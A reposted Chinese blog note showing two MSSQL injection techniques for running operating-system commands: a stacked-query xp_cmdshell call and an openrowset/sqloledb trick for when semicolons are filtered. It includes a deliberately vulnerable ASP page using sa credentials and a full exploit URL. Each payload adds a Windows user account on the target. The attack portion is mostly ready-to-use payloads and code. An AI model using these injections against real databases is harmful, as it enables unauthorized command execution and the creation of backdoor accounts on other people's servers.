MSSQL注入两种执行命令的方法

栏目: 数据库 · SQL Server · 发布时间: 6年前

内容简介:MSSQL注入两种执行命令的方法

以前遇到了一个站,Php+Mssql,不能多语句执行,就是找不到不用多语句来执行命令的方法。

其实大牛早就玩烂的东西,在自己博客做个总结笔记。

MSSQL注入两种执行命令的方法

1.能多语句。

;exec xp_cmdshell('net user luan$ lu4n.com /add');--

这个方法应该都知道,没什么可说的,图也不配了。

2.不能多语句。

这个不能多语句的原因,可能是网站过滤了分号,也可能是连接数据库的时候就限制了不能多语句执行。反正以前就是觉得很蛋疼的情况了。

select * from openrowset('sqloledb','trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''net user luan lu4n.com /add''')

这种情况,只要能带入下面这个 sql 语句即可调用xp_cmdshell,或者其他的存储过程

而且这方法还能得到执行命令的回显。

我的测试环境:

Win2003

IIS6

SqlServer 2000

mssqli.asp:

<%
 dim sql
 sql ="select * from spt_values where name='"&request("name")&"'"
 sql = replace(sql,";","")
 set conn=server.createobject("adodb.connection")
 conn.open "provider=sqloledb;source=local;uid=sa;pwd=sa;database=master"
 set rs=server.createobject("adodb.recordset")
 rs.open sql,conn,3,2
 Do While not rs.EOF
  response.write rs("name")
  rs.MoveNext
 Loop
 rs.close()
 conn.close()
%>

测试前:

MSSQL注入两种执行命令的方法

exp1:

http://192.168.52.136/mssqli.asp?name=rpc'and 'lu4n.com'=(select * from openrowset('sqloledb','trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''net user luan lu4n.com /add'''))--

截图:

MSSQL注入两种执行命令的方法

看截图是报错了,但是子查询已经完成了,命令已经执行了,只是直接这样子拿不到回显。报错注入如何回显可以参考大牛的 文章

测试后:

MSSQL注入两种执行命令的方法

sqlmap最新版里居然没有这个方法,而我在国内的很老的文章里就看到了这个方法…

sqlmap里有个功能mssql注入能切换身份来执行sql语句,但是需要其他用户的账号密码。


以上所述就是小编给大家介绍的《MSSQL注入两种执行命令的方法》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

网络空间导论

网络空间导论

李良荣、方师师 / 复旦大学出版社 / 2018-6-1 / 38

在互联网蓬勃发展的今天,新闻传播学科该往何处去?在长达半个多世纪的深入研究后,李良荣教授及其团队给出了答案:从“小新闻”走向“大传播”,并撰写了这本开创性的教材:《网络空间导论》。 在本书中,互联网被定义为“空间”——持续演进的数字化现实。为了深刻把握网络空间的内涵,本书提供了六个维度的观察:技术应用、组织架构、政治经济、媒介文化、网络素养、安全治理,并以大胆且富有建设性的观点重新定义了新闻......一起来看看 《网络空间导论》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

在线进制转换器
在线进制转换器

各进制数互转换器

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具